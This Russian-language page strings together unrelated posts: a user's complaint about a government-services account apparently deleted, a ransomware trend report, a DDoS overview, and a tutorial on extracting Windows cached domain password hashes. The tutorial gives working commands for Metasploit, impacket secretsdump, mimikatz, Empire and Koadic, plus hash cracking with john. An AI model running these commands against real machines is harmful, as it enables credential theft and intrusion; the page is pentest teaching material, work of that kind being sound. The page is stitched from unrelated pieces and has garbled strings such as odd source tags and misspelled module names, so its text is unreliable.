Информационная безопасность IT

Сегодня я планировала утренний отдых и радостное сжигание масленицы, но что-то пошло не так...

Предыстория. В этом году у нас как всегда неожиданно для коммунальщиков выпал снег. И, как всегда, "техника не справлялась, подрядчик подводил". Пару лет назад я плюнула на написание жалоб на такое поведение на наш подмосковный Добродел, потому что приходили отписки "мы все убрали!" с левыми фотками. Нынче я решилась опять им писать. Создала заявку, что мол, вокруг нашего дома не чистят, снег тает и образуется огромная лужа. Жалобу эту прикрыли из-за "нескольких проблем в описании". Ну думаю, раз вы не хотите по-хорошему убирать снег, прицепившись к словам, что еще и лужа от него есть, то наделаю-ка я вам заявок на каждую беспокоящую меня проблему рядом с домом отдельно. В итоге получилось семь жалоб (наш дом, соседний, 3 снежных навала, парковочный карман и проезд у мусорной площадки). Решила вчера перед сном проверить как и что отписываются (из окна-то видела, что делают, но не доделывают).

Собственно, что было дальше. Вход на Добродел только через госуслуги. Пишет, что пароль неверный. Пробую телефон вместо почты - тот же ответ. В приложении после прикладывания пальца пишет, что нужно входить по логину-паролю, т.к. я якобы отключила возможность заходить из мобильного приложения с этого мобильного устройства. Хорошо, пробую через браузер заходить - не пускает. Тогда пробую сменить пароль, но мне ответ, что такого пользователя нет. WTF?!?! Ну ладно, думаю, разберусь утром.

Сегодняшнее утро. На компе все тоже самое. И при попытке ввода снилса тоже. Гуглю. Нахожу, что можно регистрироваться через Сберонлайн. Регаюсь. И захожу в девственно чистый новенький профиль. Проверяю госуслуги Московской области, теперь на них тоже стало можно зайти (вход только через госуслуги) и записать дочку к врачу. Но надо опять ввести снилсы-даты рождения. На Доброделе тоже все пусто. Проверяю карту сообщений по моему району - не нахожу. Пишу в чат на госуслуги, мол, что это за фигня, почему удален аккаунт. А у него вход либо по отпечатку пальца из приложения, либо по паролю из смс. Т.е. я в любом случае узнаю про попытку входа. Мне говорят, что может я заходила в центр обслуживания и просила удалить профиль...

А дальше произошло самое интересное! Я решила не только войти в папочку "Госуслуги" в моей почте, но и тыкнуть в "Госуслуги МО". И что я вижу???

Захожу во внутрь каждого письма, а там пишут, что я сама все эти проблемы позакрывала! Вот почему на карте сообщений эти обращения отсутствовали!

Пруфы на проблемы по ссылкам

https://dobrodel.mosreg.ru/claims/5128901

https://dobrodel.mosreg.ru/claims/5128873

https://dobrodel.mosreg.ru/claims/5128845

https://dobrodel.mosreg.ru/claims/5128810

https://dobrodel.mosreg.ru/claims/5128821

https://dobrodel.mosreg.ru/claims/5128768

https://dobrodel.mosreg.ru/claims/5128790

Кому не хочется тыкать, выглядит оно примерно вот так

Все закрыто подряд с 11:08 по 11:10. Это вообще как? На госуслугах мне ответа никакого пока не дали, кроме того, что по моим данным есть только одна учетная запись. Муж, работает в информационной безопасности, говорит, что должны быть логи про мою первую запись и что бесследно такое делать не получится. Кстати, именно он мне и порекомендовал в свое время сделать двухфакторную аунтификацию, иначе бы реально можно было съехать ответственным, что это аккаунт у меня увели из-за моей беспечности. Кстати, еще неизвестно, что за инфу оттуда могли взять, если это из-под него делалось.

В общем, теперь у меня однозначно нет доверия ни к нашей администрации, которая пытаясь улучшить статистику по ответам на заявки творит самоуправство, ни к сайту госуслуг. Данные я конечно про себя-детей внесла, но если опять подгадят уже удивляться не буду.

В общем, будьте и вы в курсе, что с вами на ровном месте такое может быть!

P.S. Путинские 10 т.р. за июль до меня тоже до сих пор идут, на этой неделе пенсионный отзванивался, сказали, что проблему нашли, все пришлют. Думала вначале, что учетка полетела из-за их "исправления ошибки", но похоже ноги растут из Добродела...

UPD: Уведомила сотрудников поддержки госуслуг в чатике, что т.к. мне ничего не разъяснили и игнорировали мою просьбу создать инцидент, то я буду буду обращаться в Роскомнадзор, ФСТЭК, прокуратуру и в другие органы и приложу переписку с ними как доказательство моих попыток разобраться в ситуации до обращения в эти органы. В том числе и указала, что произошедшее подпадает под статью 272 УК РФ. И таки они завели инцидент, правда с оговоркой, что "В зависимости от сложности срок решения может составить до нескольких дней." Пару дней подожду, что за ответ мне придет

Шифровальщики фактически стали киберугрозой №1 как для бизнеса, так и для государственных органов: число успешных атак в прошлом году выросло более чем на 150% к 2019 году, а средний размер суммы выкупа увеличился более чем в два раза и составил в 2020 году $170 000, говорится в свежем отчете Group-IB «Программы-вымогатели 2020-2021 гг».

В первую очередь в зоне риска оказались крупные корпоративные сети — целенаправленные атаки вымогателей ( The Big Game Hunting) парализовали в 2020 году работу таких гигантов как Garmin, Canon, Campari, Capcom и Foxconn. Простой от одной атаки составлял в среднем 18 дней. Большинство атак, проанализированных Group-IB, произошли в Северной Америке и Европе, где расположено большинство компаний из списка Fortune 500, а также в Латинской Америке и Азиатско-Тихоокеанском регионе.

Самыми жадными вымогателями оказались группы Maze, DoppelPaymer и RagnarLocker — сумму выкупа, которые они требовали от жертвы, составляла в среднем от $1 000 000 до $2 000 000.

Преступные группы Conti, Egregor и DarkSide присоединились к «золотой лихорадке» только в прошлом году, но были настолько активны, что заняли верхние строчки неофициального рейтинга вымогателей. В топ-5 самых активных семейств шифровальщиков, по данным Group-IB, вошли Maze, Egregor, Conti, REvil и DoppelPaymer. Некоторые из них к концу года сошли с дистанции: Egregor и Netwalker пострадали от действий полиции, а операторы Maze в конце 2020 года объявили о своем уходе. Несмотря на эти события, криминальный бизнес вымогателей в 2021 году, по прогнозам экспертов Group-IB, будет по-прежнему процветать.

В России, несмотря на негласное правило у киберпреступников «не работать по РУ», действовала русскоязычная преступная группа OldGremlin — впервые Group-IB рассказала о ней в отчете в сентябре прошлого года. Начиная с весны 2020 года OldGremlin провела не менее 9 кампаний и атаковала исключительно российские цели — банки, промышленные предприятия, медицинские организации и разработчиков софта. В августе 2020 года жертвой OldGremlin стала крупная компания с сетью региональных филиалов — за расшифровку с нее потребовали выкуп в $50 000.

«За пандемию программы-вымогатели стали главной киберугрозой для всего мира, в том числе для России, — говорит Олег Скулкин, ведущий специалист Лаборатории компьютерной криминалистики Group-IB. — В прошлом году мы видели многочисленные атаки OldGremline на российские предприятия, IT-компании и финансовые учреждения. В этом году эксперты уже наблюдают активность с традиционными группами типа RTM, также переключившихся на на использование шифровальщиков».

Очень организованная преступность

Одной из основных движущих сил феноменального роста программ-вымогателей стала модель Ransomware-as-a-service («Вымогательство как услуга»). Ее смысл заключается в том, что разработчики продают или сдают в аренду свои вредоносные программы партнерам для дальнейшей компрометации сети, заражения и развертывания вымогателей. Вся полученная в виде выкупа прибыль затем распределялась между операторами и партнерами программы. Команда Group-IB DFIR отмечает, что 64% всех атак вымогателей, проанализированных в 2020 году, были связаны с операторами, использующих модель RaaS.

Еще одна тенденция 2020 года — коллаборации между разными преступными группами. Group-IB Threat Intelligence & Attribution system зафиксировала в прошлом году появление в андеграунде 15 новых публичных партнерских программ-вымогателей. Действующие преступные группы, использующие вредоносные программы Trickbot, Qakbot и Dridex, все чаще помогали операторам программ-вымогателей получать первоначальный доступ к корпоративным сетям.

Главным вектором атак для большинства банд вымогателей оказались публичные RDP-серверы. В 52% всех атак, проанализированных командой Group-IB DFIR, для получения первоначального доступа к сети использовались именно RDP-серверы, за ними следовали фишинг (29%) и эксплуатация общедоступных приложений (17%).

Прежде чем зашифровать данные, операторы вымогателей проводили в среднем 13 дней в скомпрометированной сети, стараясь предварительно найти и удалить все доступные резервные копии, чтобы жертва не могла восстановить зашифрованные файлы. Еще одним фактором успеха, позволившим бандам получать выкуп, стало предварительное хищение критически важных данных — документов, отчетов, чтобы использовать их в качестве рычага для давления на жертву — моду на подобный «двойной удар» задала печально известная группа Maze.

Учитывая, что большинство атак шифровальщиков управляются человеком — «вручную», специалистам по информационной безопасности критически важно понимать, какие тактики, техники и процедуры (TTP) используют злоумышленники. Полный технический анализ TTPs атакующих, сопоставленных в соответствии с MITRE ATT&CK®, публичной базой знаний, в которой собраны тактики и техники целевых атак, а также рекомендации по поиску и обнаружению угроз, собранные командой Group-IB Digital Forensics and Incident Response (DFIR), уже сейчас доступны в новом отчете «Программы-вымогатели 2020-2021 гг».

Источник

DDoS-атака (Distributed Denial of Service attack) — комплекс действий, способный полностью или частично вывести из строя интернет-ресурс. В качестве жертвы может выступать практически любой интернет-ресурс, например веб-сайт, игровой сервер или государственный ресурс. На данный момент практически невозможна ситуация, когда хакер в одиночку организует DDoS-атаку. В большинстве случаев злоумышленник использует сеть из компьютеров, зараженных вирусом. Вирус позволяет получать необходимый и достаточный удаленный доступ к зараженному компьютеру. Сеть из таких компьютеров называется ботнет. Как правило, в ботнетах присутствует координирующий сервер. Решив реализовать атаку, злоумышленник отправляет команду координирующему серверу, который в свою очередь дает сигнал каждому боту начать выполнение вредоносных сетевых запросов.

Причины DDoS-атак

Мотивы для осуществления DDoS-атак могут быть самыми разнообразными: от конкуренции до личной неприязни. Мы собрали основные причины DDoS-атак и решили поделиться с Вами этой информацией:

Личная неприязнь

Эта причина встречается довольно часто. Некоторое время назад независимый журналист-исследователь Брайан Кребс раскрыл деятельность крупнейшего сервиса по осуществлению заказных DDoS-атак — vDOS. Информация была представлена в полных подробностях, что вызвало арест организаторов данного сервиса. В ответ хакеры организовали атаку на блог журналиста, мощность которой достигла 1 Тбит/с. Эта атака стала самой мощной в мире за все годы.

Развлечение

В настоящее время становится все проще организовать примитивную DDoS-атаку своими силами. Такая атака будет крайне не совершенна и не анонимна. К сожалению, большинство из тех, кто решил ощутить себя в роли «хакера», не догадываются ни о первом, ни о втором. Тем не менее, многие школьники часто практикуют DDoS-атаки. Итог таких случаев бывает самым разнообразным.

Политический протест (хактивизм)

Одной из первых атак, имеющих социальную почву является DDoS-атака, реализованная в 1996 году хакером Omega. Omega являлся членом хакерской коалиции «Cult of the Dead Crew» (cDc). Термин хактивизм стал популярным в СМИ в связи с участившимися кибератаками, имеющим социальную почву. Типичными представителями хактивистов являются группы Anonymous и LulzSec.

Недобросовестная конкуренция

Такие мотивы часто бывают в индустрии игровых серверов, но и в отрасли торговли такие случаи встречаются довольно нередко. Достаточно действенный способ недобросовестной конкуренции, способный разрушить репутацию торговой площадки, если её владельцы вовремя не обратятся за помощью к специалистам. Такой мотив можно выделить среди остальных, как наиболее встречающийся.

Вымогательство или шантаж

В этом случае злоумышленник требует с потенциальной жертвы денежную сумму за несовершение атаки. Либо за её прекращение. Часто жертвами таких атак становятся крупные организации, например в течение 2014 были атакованы банк «Тинькофф» и IT-ресурс Хабрахабр, крупнейший торрент-трекер Rutracker.org (как это было?).

Последствия DDoS-атак

Последствия DDoS-атак могут быть самыми разнообразными, от отключения датацентром Вашего сервера до полной потери репутации ресурса и клиентопотока. Многие организации с целью экономии неосознанно выбирают недобросовестных провайдеров защиты, что часто не приносит никакой пользы. Во избежание подобных проблем мы рекомендуем обратиться к профессионалам в своей отрасли.

Атаки, вошедшие в историю Интернет

Технический прогресс идет семимильными шагами и злоумышленники, в свою очередь, прикладывают все усилия, чтобы не стоять на месте и реализовывать все более сложные и мощные атаки. Мы собрали краткое описание наиболее интересных случаев, которые вошли в историю DDoS-атак. Часть из них может показаться обычными по современным меркам, но во время, когда они происходили, это были очень масштабные атаки.

Пинг смерти (Ping Of Dead). Способ атаки, базирующийся на использовании команды ping. Эта атака получила популярность в 1990-х годах, благодаря несовершенству сетевого оборудования. Суть атаки заключается в отправке на сетевой узел одного запроса ping, при этом в тело пакета включаются не стандартные 64 байта данных, а 65535 байт. При получении такого пакета у оборудования переполнялся сетевой стэк и что вызывало отказ в обслуживании.

Атака, повлиявшая на стабильность работы Интернет. В 2013 году компания Spamhaus стала жертвой атаки мощностью более 280 Гбит/с. Самое интересное то, что для атаки хакеры использовали DNS-сервера из сети интернет, которые в свою очередь были очень загружены большим количеством запросов. В те сутки миллионы пользователей жаловались на медленно загружающиеся страницы в связи с перегруженности службы DNS.

Рекордная атака с трафиком более 1 Тбит/с. В 2016 году хакеры пытались атаковать нас пакетной атакой со скоростью 360 Mpps и 1 Тбит/с. Эта цифра стала рекордной за время существования Интернет. Но и под такой атакой мы устояли и нагрузка на сеть лишь незначительно ограничила свободные ресурсы сетевого оборудования.

Характеристика атак сегодня

Исключая пиковые атаки можно сказать, что мощность атак с каждым годом растет более, чем в 3-4 раза. География атакующих от года к году изменяется лишь частично, ведь это обусловлено максимальным количеством компьютеров в определенной стране. Как видно из квартального отчета за 2016 год, подготовленного нашими специалистами, странами-рекордсменами по количеству ботов выступают Россия, США и Китай.

Какие бывают DDoS-атаки?

На данный момент типы атак можно разделить на 3 класса:

Атаки, направленные на переполнение канала

К этому типу атак можно отнести DNS амплификацию, ICMP флуд, UDP флуд и другие атаки с амплификацией;

Атаки, использующие уязвимости стека сетевых протоколов

Наиболее популярными и интересными атаками этого типа являются ACK/PUSH ACK флуд, SYN флуд, TCP null/IP null атака, Пинг смерти (Ping of death);

Атаки на уровень приложений

Среди атак на уровень приложений можно выделить следующие типы: HTTP флуд, атака фрагментированными HTTP пакетами, атака медленными сессиями (SlowLoris).

Источник - 我的

В этой статье будет рассмотрена атака с целью получения учетных записей из кэша домена и различные техники для извлечения хэшей паролей через эксплуатацию пользователя домена.

Domain Cache credential (DCC2)

Microsoft Windows хранит информацию о предыдущей авторизации пользователей локально. Соответственно, эти сведения используются в случае, если сервер авторизации (logon server) окажется недоступным. Эта технология носит название Domain Cache credential (или по другому MSCACHE или MSCASH хэш), которая сортирует хэши паролей пользователей, чтобы вы не смогли выполнить атаки навроде pass-the-hash. Для генерации хэшей используется алгоритм MSCACHE, хранящихся локально в реестре операционной системы Windows (по умолчанию, последние 10 хэшей).

Существует две версии MSCASH/MSCACHE (или DCC):

MSCACHEV1 или DCC1, используемый до Vista и Server 2003

MSCACHEV2 или DCC2, используемый после Vista и Server 2003

Переходим к рассмотрению техник для извлечения хэшей.

Metasploit

Metasploit – первый инструмент в нашем списке, помогающий пентестеру извлекать MSCACHE хэши, хранимые в реестре. Соответствующий модуль извлекает хэши домена, которые были закэшированы в результате настройки групповой политики (GPO). По умолчанию Windows хранит информацию о 10 последних успешных авторизаций:

use post/windows/gather/cachedump

set session 2

exploit

По результатам отработки модуля выгружаются хэши паролей из DCC2/MSCACHE, как показано на рисунке ниже:

Impacket

Этот тип хэшей также можно извлечь при помощи Python и библиотек impacket. Перед использованием данной техники следует сохранить ветви реестра system и security на локальной машине при помощи следующих команд:

reg save hklm\system c:\system

reg save hklm\security c:\secuirty

Рисунок: Сохранение ветвей реестра на локальную машину

Далее скопируйте полученные файлы туда, где установлен impacket. В нашем случае копирование происходит в систему с Kali Linux. Затем для извлечения DCC2/MSCACHE хэшей используем следующую команду:

python secretsdump.py -security -system system LOCAL

Результат отработки скрипта показан на рисунке ниже:

Рисунок: Выгрузка хэшей при помощи скрипта secretsdump.py

Mimikatz

Ни для кого не секрет, что mimikatz – одна из наилучших утилит в арсенале пентестера для извлечения учетных записей в ОС Windows. С целью извлечения DCC2 / MSCACHEv2 хэшей необходимо установить mimikatz на скомпрометированной машине и выполнить следующую команду:

privilege::debug

token::elevate

lsadump::cache

Результат выполнения вышеуказанных команд показан на рисунке ниже:

Рисунок: Выгрузка хэшей при помощи mimikatz

PowerShell Empire

Переходим к следующей технике. В PowerShell Empire есть модуль для извлечения MSCACHEV2 хэшей из реестра скомпрометированной машины. Загрузите и запустите Empire в вашей локальной системе, скомпрометируйте целевой хост с целью использования пост-модуля, а затем введите следующую команду:

usemodule credentails/mimikatz/cache

set agent <agent_id>

execute

Результаты работы модуля по выгрузке MSCACHEv2 хэшей показаны на рисунке ниже:

Рисунок: Результат выгрузки хэшей при помощи модуля в PowerShell Empire

Koadic

Как и в случае с Powershell Empire, вы можете использовать утилиту Koadic для извлечения DCC2 хэшей при помощи следующего модуля:

use mimikatz_dotnet2js

set MIMICMD lsadump::cache

Результаты работы этого модуля показаны на рисунке ниже:

Рисунок: Извлечение хэшей при помощи Koadic

Python скрипт

Как и в примере с impacket вы можете воспользоваться скриптом mscache.py для извлечения MSCACHEV2 хэшей. Загрузите скрипт с github, и во время запуска в качестве параметров укажите пути к выгруженным файлам (как рассматривалось в разделе с impacket):

python mscache.py --security /root/Desktop/security –system /root/Desktop/system

Результаты работы скрипта показаны на рисунке ниже:

Рисунок: Выгрузка хэшей при помощи скрипта mscache.py

Расшифровка полученных хэшей

Как мы уже знаем, эти хэши не используются во время атак pass the hash, и нам нужна утилита john the ripper для расшифровки:

john --format=mscasch2 --wordlist=/usr/share/wordlists/rockyou.txt mhash

В результате получаем пароль в открытом виде для указанного хэша. Старайтесь не путаться между понятиями DCC2 и MSCACHEV2/MSCASH. Эти хэши идентичные и могут извлекаться при помощи вышеуказанных техник.

Источник здесь - 我的